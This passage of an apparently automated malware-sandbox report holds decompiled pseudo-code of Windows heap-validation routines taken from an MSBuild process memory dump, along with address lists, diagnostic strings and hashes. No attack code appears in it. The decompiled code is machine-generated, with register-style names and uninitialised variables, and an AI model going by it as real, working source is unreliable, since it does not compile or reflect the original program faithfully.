                                            													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                            													L60:
                                            													_t94 = _t415 + 8; // -16
                                            													E0102E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                            													goto L61;
                                            												}
                                            												_t405 = _t307;
                                            											}
                                            											_t309 = _t380;
                                            											goto L60;
                                            										}
                                            									} else {
                                            										_t407 =  *(_t414 + 0x4c);
                                            										while(1) {
                                            											__eflags = _t407;
                                            											if(_t407 == 0) {
                                            												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                            											} else {
                                            												_t315 =  *(_t378 - 8);
                                            												_t407 =  *(_t414 + 0x4c);
                                            												__eflags = _t315 & _t407;
                                            												if((_t315 & _t407) != 0) {
                                            													_t315 = _t315 ^  *(_t414 + 0x50);
                                            													__eflags = _t315;
                                            												}
                                            												_t312 = _t315 & 0x0000ffff;
                                            											}
                                            											__eflags = _v28 - (_t312 & 0x0000ffff);
                                            											if(_v28 <= (_t312 & 0x0000ffff)) {
                                            												goto L51;
                                            											}
                                            											_t378 =  *_t378;
                                            											__eflags = _t414 + 0xc0 - _t378;
                                            											if(_t414 + 0xc0 != _t378) {
                                            												continue;
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            								}
                                            								_t317 = E0102A229(_t414, _t415);
                                            								__eflags = _t317;
                                            								if(_t317 != 0) {
                                            									goto L39;
                                            								}
                                            								E0102A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                            								goto L86;
                                            							}
                                            							_t385 =  *_t415 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                            								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                            									break;
                                            								}
                                            								_t320 =  *_t402;
                                            								__eflags = _t320;
                                            								if(_t320 == 0) {
                                            									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                            									L34:
                                            									_t63 = _t415 + 8; // -16
                                            									E0102BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                            									_t374 = _v24;
                                            									goto L35;
                                            								}
                                            								_t402 = _t320;
                                            							}
                                            							_t322 = _t385;
                                            							goto L34;
                                            						}
                                            					}
                                            					if(_a20 == 0) {
                                            						L18:
                                            						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                            							goto L67;
                                            						}
                                            						if(E010B23E3(_t414, _t415) == 0) {
                                            							goto L117;
                                            						}
                                            						goto L67;
                                            					} else {
                                            						if((_t390 & 0x00000002) == 0) {
                                            							_t326 =  *(_t415 + 3) & 0x000000ff;
                                            						} else {
                                            							_t328 = E01001F5B(_t415);
                                            							_t342 = _v20;
                                            							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                            						}
                                            						_t429 = _t326;
                                            						if(_t429 == 0) {
                                            							goto L18;
                                            						}
                                            						if(_t429 >= 0) {
                                            							__eflags = _t326 & 0x00000800;
                                            							if(__eflags != 0) {
                                            								goto L18;
                                            							}
                                            							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                            							if(__eflags >= 0) {
                                            								goto L18;
                                            							}
                                            							_t412 = _a20;
                                            							_t327 = _t326 & 0x0000ffff;
                                            							L17:
                                            							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                            							goto L18;
                                            						}
                                            						_t327 = _t326 & 0x00007fff;
                                            						if(_t327 >= 0x81) {
                                            							goto L18;
                                            						}
                                            						_t412 = _a24;
                                            						goto L17;
                                            					}
                                            					L86:
                                            				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                            				_t189 = _v12;
                                            				goto L88;
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: c94b604275cc2d1b9954be791d2511d047621a784526488af777fff2faa363df
                                            • Instruction ID: ba88b4844498ed116897acdecac0d298285e0bf34b171ded7da1e0f13967c33a
                                            • Opcode Fuzzy Hash: c94b604275cc2d1b9954be791d2511d047621a784526488af777fff2faa363df
                                            • Instruction Fuzzy Hash: 8B12AA346006469BE725DF69C4A4ABEBBE1FF48B10F1484ADE5C6CB681D734E881CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 56%
                                            			E010C4496(signed int* __ecx, void* __edx) {
                                            				signed int _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed char _v24;
                                            				signed int* _v28;
                                            				char _v32;
                                            				signed int* _v36;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t150;
                                            				intOrPtr _t151;
                                            				signed char _t156;
                                            				intOrPtr _t157;
                                            				unsigned int _t169;
                                            				intOrPtr _t170;
                                            				signed int* _t183;
                                            				signed char _t184;
                                            				intOrPtr _t191;
                                            				signed int _t201;
                                            				intOrPtr _t203;
                                            				intOrPtr _t212;
                                            				intOrPtr _t220;
                                            				signed int _t230;
                                            				signed int _t241;
                                            				signed int _t244;
                                            				void* _t259;
                                            				signed int _t260;
                                            				signed int* _t261;
                                            				intOrPtr* _t262;
                                            				signed int _t263;
                                            				signed int* _t264;
                                            				signed int _t267;
                                            				signed int* _t268;
                                            				void* _t270;
                                            				void* _t281;
                                            				signed short _t285;
                                            				signed short _t289;
                                            				signed int _t291;
                                            				signed int _t298;
                                            				signed char _t303;
                                            				signed char _t308;
                                            				signed int _t314;
                                            				intOrPtr _t317;
                                            				unsigned int _t319;
                                            				signed int* _t325;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				intOrPtr _t328;
                                            				signed int _t329;
                                            				signed int _t330;
                                            				signed int* _t331;
                                            				signed int _t332;
                                            				signed int _t350;
                                            
                                            				_t259 = __edx;
                                            				_t331 = __ecx;
                                            				_v28 = __ecx;
                                            				_v20 = 0;
                                            				_v12 = 0;
                                            				_t150 = E010C49A4(__ecx);
                                            				_t267 = 1;
                                            				if(_t150 == 0) {
                                            					L61:
                                            					_t151 =  *[fs:0x30];
                                            					__eflags =  *((char*)(_t151 + 2));
                                            					if( *((char*)(_t151 + 2)) != 0) {
                                            						 *0x10f6378 = _t267;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					__eflags = _v12;
                                            					if(_v12 != 0) {
                                            						_t105 =  &_v16;
                                            						 *_t105 = _v16 & 0x00000000;
                                            						__eflags =  *_t105;
                                            						E0103174B( &_v12,  &_v16, 0x8000);
                                            					}
                                            					L65:
                                            					__eflags = 0;
                                            					return 0;
                                            				}
                                            				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                            					_t268 =  &(_t331[0x30]);
                                            					_v32 = 0;
                                            					_t260 =  *_t268;
                                            					_t308 = 0;
                                            					_v24 = 0;
                                            					while(_t268 != _t260) {
                                            						_t260 =  *_t260;
                                            						_v16 =  *_t325 & 0x0000ffff;
                                            						_t156 = _t325[0];
                                            						_v28 = _t325;
                                            						_v5 = _t156;
                                            						__eflags = _t156 & 0x00000001;
                                            						if((_t156 & 0x00000001) != 0) {
                                            							_t157 =  *[fs:0x30];
                                            							__eflags =  *(_t157 + 0xc);
                                            							if( *(_t157 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t325);
                                            							E0100B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                            							L32:
                                            							_t270 = 0;
                                            							__eflags = _t331[0x13];
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            							}
                                            							L60:
                                            							_t267 = _t270 + 1;
                                            							__eflags = _t267;
                                            							goto L61;
                                            						}
                                            						_t169 =  *_t325 & 0x0000ffff;
                                            						__eflags = _t169 - _t308;
                                            						if(_t169 < _t308) {
                                            							_t170 =  *[fs:0x30];
                                            							__eflags =  *(_t170 + 0xc);
                                            							if( *(_t170 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							E0100B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                            							goto L32;
                                            						} else {
                                            							__eflags = _t331[0x13];
                                            							_t308 = _t169;
                                            							_v24 = _t308;
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            								__eflags =  *_t325;
                                            							}
                                            							_t26 =  &_v32;
                                            							 *_t26 = _v32 + 1;
                                            							__eflags =  *_t26;
                                            							continue;
                                            						}
                                            					}
                                            					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                            					if( *0x10f6350 != 0 && _t331[0x2f] != 0) {
                                            						_push(4);
                                            						_push(0x1000);
                                            						_push( &_v16);
                                            						_push(0);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						if(E01049660() >= 0) {
                                            							_v20 = _v12 + 0x204;
                                            						}
                                            					}
                                            					_t183 =  &(_t331[0x27]);
                                            					_t281 = 0x81;
                                            					_t326 =  *_t183;
                                            					if(_t183 == _t326) {
                                            						L49:
                                            						_t261 =  &(_t331[0x29]);
                                            						_t184 = 0;
                                            						_t327 =  *_t261;
                                            						_t282 = 0;
                                            						_v24 = 0;
                                            						_v36 = 0;
                                            						__eflags = _t327 - _t261;
                                            						if(_t327 == _t261) {
                                            							L53:
                                            							_t328 = _v32;
                                            							_v28 = _t331;
                                            							__eflags = _t328 - _t184;
                                            							if(_t328 == _t184) {
                                            								__eflags = _t331[0x1d] - _t282;
                                            								if(_t331[0x1d] == _t282) {
                                            									__eflags = _v12;
                                            									if(_v12 == 0) {
                                            										L82:
                                            										_t267 = 1;
                                            										__eflags = 1;
                                            										goto L83;
                                            									}
                                            									_t329 = _t331[0x2f];
                                            									__eflags = _t329;
                                            									if(_t329 == 0) {
                                            										L77:
                                            										_t330 = _t331[0x22];
                                            										__eflags = _t330;
                                            										if(_t330 == 0) {
                                            											L81:
                                            											_t129 =  &_v16;
                                            											 *_t129 = _v16 & 0x00000000;
                                            											__eflags =  *_t129;
                                            											E0103174B( &_v12,  &_v16, 0x8000);
                                            											goto L82;
                                            										}
                                            										_t314 = _t331[0x21] & 0x0000ffff;
                                            										_t285 = 1;
                                            										__eflags = 1 - _t314;
                                            										if(1 >= _t314) {
                                            											goto L81;
                                            										} else {
                                            											goto L79;
                                            										}
                                            										while(1) {
                                            											L79:
                                            											_t330 = _t330 + 0x40;
                                            											_t332 = _t285 & 0x0000ffff;
                                            											_t262 = _v20 + _t332 * 4;
                                            											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                            											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                            												break;
                                            											}
                                            											_t285 = _t285 + 1;
                                            											__eflags = _t285 - _t314;
                                            											if(_t285 < _t314) {
                                            												continue;
                                            											}
                                            											goto L81;
                                            										}
                                            										_t191 =  *[fs:0x30];
                                            										__eflags =  *(_t191 + 0xc);
                                            										if( *(_t191 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_t262);
                                            										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                            										_t148 = _t330 + 0x10; // 0x10
                                            										_push( *((intOrPtr*)(_t330 + 8)));
                                            										E0100B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                            										L59:
                                            										_t270 = 0;
                                            										__eflags = 0;
                                            										goto L60;
                                            									}
                                            									_t289 = 1;
                                            									__eflags = 1;
                                            									while(1) {
                                            										_t201 = _v12;
                                            										_t329 = _t329 + 0xc;
                                            										_t263 = _t289 & 0x0000ffff;
                                            										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                            										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                            											break;
                                            										}
                                            										_t289 = _t289 + 1;
                                            										__eflags = _t289 - 0x81;
                                            										if(_t289 < 0x81) {
                                            											continue;
                                            										}
                                            										goto L77;
                                            									}
                                            									_t203 =  *[fs:0x30];
                                            									__eflags =  *(_t203 + 0xc);
                                            									if( *(_t203 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E0100B150();
                                            									} else {
                                            										E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_t291 = _v12;
                                            									_push(_t291 + _t263 * 4);
                                            									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                            									_push( *((intOrPtr*)(_t329 + 8)));
                                            									E0100B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                            									goto L59;
                                            								}
                                            								_t212 =  *[fs:0x30];
                                            								__eflags =  *(_t212 + 0xc);
                                            								if( *(_t212 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_t331[0x1d]);
                                            								_push(_v36);
                                            								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                            								L58:
                                            								E0100B150();
                                            								goto L59;
                                            							}
                                            							_t220 =  *[fs:0x30];
                                            							__eflags =  *(_t220 + 0xc);
                                            							if( *(_t220 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t328);
                                            							_push(_v24);
                                            							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                            							goto L58;
                                            						} else {
                                            							goto L50;
                                            						}
                                            						while(1) {
                                            							L50:
                                            							_t92 = _t327 - 0x10; // -24
                                            							_t282 = _t331;
                                            							_t230 = E010C4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                            							__eflags = _t230;
                                            							if(_t230 == 0) {
                                            								goto L59;
                                            							}
                                            							_t327 =  *_t327;
                                            							__eflags = _t327 - _t261;
                                            							if(_t327 != _t261) {
                                            								continue;
                                            							}
                                            							_t184 = _v24;
                                            							_t282 = _v36;
                                            							goto L53;
                                            						}
                                            						goto L59;
                                            					} else {
                                            						while(1) {
                                            							_t39 = _t326 + 0x18; // 0x10
                                            							_t264 = _t39;
                                            							if(_t331[0x13] != 0) {
                                            								_t319 = _t331[0x14] ^  *_t264;
                                            								 *_t264 = _t319;
                                            								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                            								_t348 = _t319 >> 0x18 - _t303;
                                            								if(_t319 >> 0x18 != _t303) {
                                            									_push(_t303);
                                            									E010BFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                            								}
                                            								_t281 = 0x81;
                                            							}
                                            							_t317 = _v20;
                                            							if(_t317 != 0) {
                                            								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                            								_t350 = _t241;
                                            								if(_t350 != 0) {
                                            									if(_t350 >= 0) {
                                            										__eflags = _t241 & 0x00000800;
                                            										if(__eflags == 0) {
                                            											__eflags = _t241 - _t331[0x21];
                                            											if(__eflags < 0) {
                                            												_t298 = _t241;
                                            												_t65 = _t317 + _t298 * 4;
                                            												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                            												__eflags =  *_t65;
                                            											}
                                            										}
                                            									} else {
                                            										_t244 = _t241 & 0x00007fff;
                                            										if(_t244 < _t281) {
                                            											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                            										}
                                            									}
                                            								}
                                            							}
                                            							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010B23E3(_t331, _t264) == 0) {
                                            								break;
                                            							}
                                            							if(_t331[0x13] != 0) {
                                            								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                            								 *_t264 =  *_t264 ^ _t331[0x14];
                                            							}
                                            							_t326 =  *_t326;
                                            							if( &(_t331[0x27]) == _t326) {
                                            								goto L49;
                                            							} else {
                                            								_t281 = 0x81;
                                            								continue;
                                            							}
                                            						}
                                            						__eflags = _t331[0x13];
                                            						if(_t331[0x13] != 0) {
                                            							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                            							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                            						}
                                            						goto L65;
                                            					}
                                            				} else {
                                            					L83:
                                            					return _t267;
                                            				}
                                            			}



























































                                            0x010c479c
                                            0x010c479c
                                            0x010c479f
                                            0x010c47a2
                                            0x010c47a4
                                            0x010c4830
                                            0x010c4833
                                            0x010c4879
                                            0x010c487d
                                            0x010c48f1
                                            0x010c48f3
                                            0x010c48f3
                                            0x00000000
                                            0x010c48f3
                                            0x010c487f
                                            0x010c4885
                                            0x010c4887
                                            0x010c48a8
                                            0x010c48a8
                                            0x010c48ae
                                            0x010c48b0
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48dc
                                            0x010c48ec
                                            0x00000000
                                            0x010c48ec
                                            0x010c48b2
                                            0x010c48bc
                                            0x010c48be
                                            0x010c48c1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48c3
                                            0x010c48c3
                                            0x010c48c6
                                            0x010c48c9
                                            0x010c48cc
                                            0x010c48d1
                                            0x010c48d4
                                            0x00000000
                                            0x00000000
                                            0x010c48d6
                                            0x010c48d7
                                            0x010c48da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48da
                                            0x010c494f
                                            0x010c4955
                                            0x010c4959
                                            0x010c4978
                                            0x010c497d
                                            0x010c495b
                                            0x010c4970
                                            0x010c4975
                                            0x010c4986
                                            0x010c4987
                                            0x010c498a
                                            0x010c498d
                                            0x010c4997
                                            0x010c47ef
                                            0x010c47ef
                                            0x010c47ef
                                            0x00000000
                                            0x010c47ef
                                            0x010c4890
                                            0x010c4890
                                            0x010c4891
                                            0x010c4891
                                            0x010c4894
                                            0x010c4897
                                            0x010c489d
                                            0x010c48a0
                                            0x00000000
                                            0x00000000
                                            0x010c48a2
                                            0x010c48a3
                                            0x010c48a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c48a6
                                            0x010c48fb
                                            0x010c4901
                                            0x010c4905
                                            0x010c4924
                                            0x010c4929
                                            0x010c4907
                                            0x010c491c
                                            0x010c4921
                                            0x010c492f
                                            0x010c4935
                                            0x010c4936
                                            0x010c4939
                                            0x010c4942
                                            0x00000000
                                            0x010c4947
                                            0x010c4835
                                            0x010c483b
                                            0x010c483f
                                            0x010c485e
                                            0x010c4863
                                            0x010c4841
                                            0x010c4856
                                            0x010c485b
                                            0x010c4869
                                            0x010c486c
                                            0x010c486f
                                            0x010c47e7
                                            0x010c47e7
                                            0x00000000
                                            0x010c47ec
                                            0x010c47aa
                                            0x010c47b0
                                            0x010c47b4
                                            0x010c47d3
                                            0x010c47d8
                                            0x010c47b6
                                            0x010c47cb
                                            0x010c47d0
                                            0x010c47de
                                            0x010c47df
                                            0x010c47e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c476f
                                            0x010c476f
                                            0x010c4778
                                            0x010c4785
                                            0x010c4787
                                            0x010c478c
                                            0x010c478e
                                            0x00000000
                                            0x00000000
                                            0x010c4790
                                            0x010c4792
                                            0x010c4794
                                            0x00000000
                                            0x00000000
                                            0x010c4796
                                            0x010c4799
                                            0x00000000
                                            0x010c4799
                                            0x00000000
                                            0x010c45c3
                                            0x010c45c3
                                            0x010c45c7
                                            0x010c45c7
                                            0x010c45ca
                                            0x010c45cf
                                            0x010c45d3
                                            0x010c45df
                                            0x010c45e4
                                            0x010c45e6
                                            0x010c45e8
                                            0x010c45ed
                                            0x010c45ed
                                            0x010c45f2
                                            0x010c45f2
                                            0x010c45f7
                                            0x010c45fc
                                            0x010c4602
                                            0x010c4606
                                            0x010c4609
                                            0x010c460f
                                            0x010c46de
                                            0x010c46e3
                                            0x010c46e5
                                            0x010c46ec
                                            0x010c46ee
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46f6
                                            0x010c46ec
                                            0x010c4615
                                            0x010c4615
                                            0x010c461d
                                            0x010c462e
                                            0x010c462e
                                            0x010c461d
                                            0x010c460f
                                            0x010c4609
                                            0x010c46fd
                                            0x00000000
                                            0x00000000
                                            0x010c4710
                                            0x010c471a
                                            0x010c4720
                                            0x010c4720
                                            0x010c4722
                                            0x010c472c
                                            0x00000000
                                            0x010c472e
                                            0x010c472e
                                            0x00000000
                                            0x010c472e
                                            0x010c472c
                                            0x010c4738
                                            0x010c473c
                                            0x010c474b
                                            0x010c4751
                                            0x010c4751
                                            0x00000000
                                            0x010c473c
                                            0x010c48f4
                                            0x010c48f4
                                            0x00000000
                                            0x010c48f4

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                            • API String ID: 0-1357697941
                                            • Opcode ID: 214c328c7bd9edbaeb56db5189bd1b83387a63e3f0f273b42b9f5743623e729b
                                            • Instruction ID: 1f5a6e6943bbac219a6d976d9f7511ed0b935143aaf6d4b25b44001ec6610b56
                                            • Opcode Fuzzy Hash: 214c328c7bd9edbaeb56db5189bd1b83387a63e3f0f273b42b9f5743623e729b
                                            • Instruction Fuzzy Hash: 7BF1FE31A00646DFEB25CBA8C4A0BAEBBF1FF59B04F04816DE186D7681C734A949CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0102A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                            				char _v8;
                                            				signed short _v12;
                                            				signed short _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				unsigned int _v52;
                                            				signed int _v56;
                                            				void* _v60;
                                            				intOrPtr _v64;
                                            				void* _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				unsigned int _t246;
                                            				signed char _t247;
                                            				signed short _t249;
                                            				unsigned int _t256;
                                            				signed int _t262;
                                            				signed int _t265;
                                            				signed int _t266;
                                            				signed int _t267;
                                            				intOrPtr _t270;
                                            				signed int _t280;
                                            				signed int _t286;
                                            				signed int _t289;
                                            				intOrPtr _t290;
                                            				signed int _t291;
                                            				signed int _t317;
                                            				signed short _t320;
                                            				intOrPtr _t327;
                                            				signed int _t339;
                                            				signed int _t344;
                                            				signed int _t347;
                                            				intOrPtr _t348;
                                            				signed int _t350;
                                            				signed int _t352;
                                            				signed int _t353;
                                            				signed int _t356;
                                            				intOrPtr _t357;
                                            				intOrPtr _t366;
                                            				signed int _t367;
                                            				signed int _t370;
                                            				intOrPtr _t371;
                                            				signed int _t372;
                                            				signed int _t394;
                                            				signed short _t402;
                                            				intOrPtr _t404;
                                            				intOrPtr _t415;
                                            				signed int _t430;
                                            				signed int _t433;
                                            				signed int _t437;
                                            				signed int _t445;
                                            				signed short _t446;
                                            				signed short _t449;
                                            				signed short _t452;
                                            				signed int _t455;
                                            				signed int _t460;
                                            				signed short* _t468;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				signed int _t483;
                                            				intOrPtr _t484;
                                            				signed int _t491;
                                            				unsigned int _t506;
                                            				unsigned int _t508;
                                            				signed int _t513;
                                            				signed int _t514;
                                            				signed int _t521;
                                            				signed short* _t533;
                                            				signed int _t541;
                                            				signed int _t543;
                                            				signed int _t546;
                                            				unsigned int _t551;
                                            				signed int _t553;
                                            
                                            				_t450 = __ecx;
                                            				_t553 = __ecx;
                                            				_t539 = __edx;
                                            				_v28 = 0;
                                            				_v40 = 0;
                                            				if(( *(__ecx + 0xcc) ^  *0x10f8a68) != 0) {
                                            					_push(_a4);
                                            					_t513 = __edx;
                                            					L11:
                                            					_t246 = E0102A830(_t450, _t513);
                                            					L7:
                                            					return _t246;
                                            				}
                                            				if(_a8 != 0) {
                                            					__eflags =  *(__edx + 2) & 0x00000008;
                                            					if(( *(__edx + 2) & 0x00000008) != 0) {
                                            						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                            						_t430 = E0102DF24(__edx,  &_v12,  &_v16);
                                            						__eflags = _t430;
                                            						if(_t430 != 0) {
                                            							_t157 = _t553 + 0x234;
                                            							 *_t157 =  *(_t553 + 0x234) - _v16;
                                            							__eflags =  *_t157;
                                            						}
                                            					}
                                            					_t445 = _a4;
                                            					_t514 = _t539;
                                            					_v48 = _t539;
                                            					L14:
                                            					_t247 =  *((intOrPtr*)(_t539 + 6));
                                            					__eflags = _t247;
                                            					if(_t247 == 0) {
                                            						_t541 = _t553;
                                            					} else {
                                            						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                            						__eflags = _t541;
                                            					}
                                            					_t249 = 7 + _t445 * 8 + _t514;
                                            					_v12 = _t249;
                                            					__eflags =  *_t249 - 3;
                                            					if( *_t249 == 3) {
                                            						_v16 = _t514 + _t445 * 8 + 8;
                                            						E01009373(_t553, _t514 + _t445 * 8 + 8);
                                            						_t452 = _v16;
                                            						_v28 =  *(_t452 + 0x10);
                                            						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                            						_v36 =  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                            						_t256 =  *(_t452 + 0x14);
                                            						__eflags = _t256 - 0x7f000;
                                            						if(_t256 >= 0x7f000) {
                                            							_t142 = _t553 + 0x1ec;
                                            							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                            							__eflags =  *_t142;
                                            							_t256 =  *(_t452 + 0x14);
                                            						}
                                            						_t513 = _v48;
                                            						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                            						_a4 = _t445;
                                            						_v40 = 1;
                                            					} else {
                                            						_t27 =  &_v36;
                                            						 *_t27 = _v36 & 0x00000000;
                                            						__eflags =  *_t27;
                                            					}
                                            					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                            					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                            						_v44 = _t513;
                                            						_t262 = E0100A9EF(_t541, _t513);
                                            						__eflags = _a8;
                                            						_v32 = _t262;
                                            						if(_a8 != 0) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								goto L19;
                                            							}
                                            						}
                                            						__eflags =  *0x10f8748 - 1;
                                            						if( *0x10f8748 >= 1) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								_t415 =  *[fs:0x30];
                                            								__eflags =  *(_t415 + 0xc);
                                            								if( *(_t415 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push("(UCRBlock != NULL)");
                                            								E0100B150();
                                            								__eflags =  *0x10f7bc8;
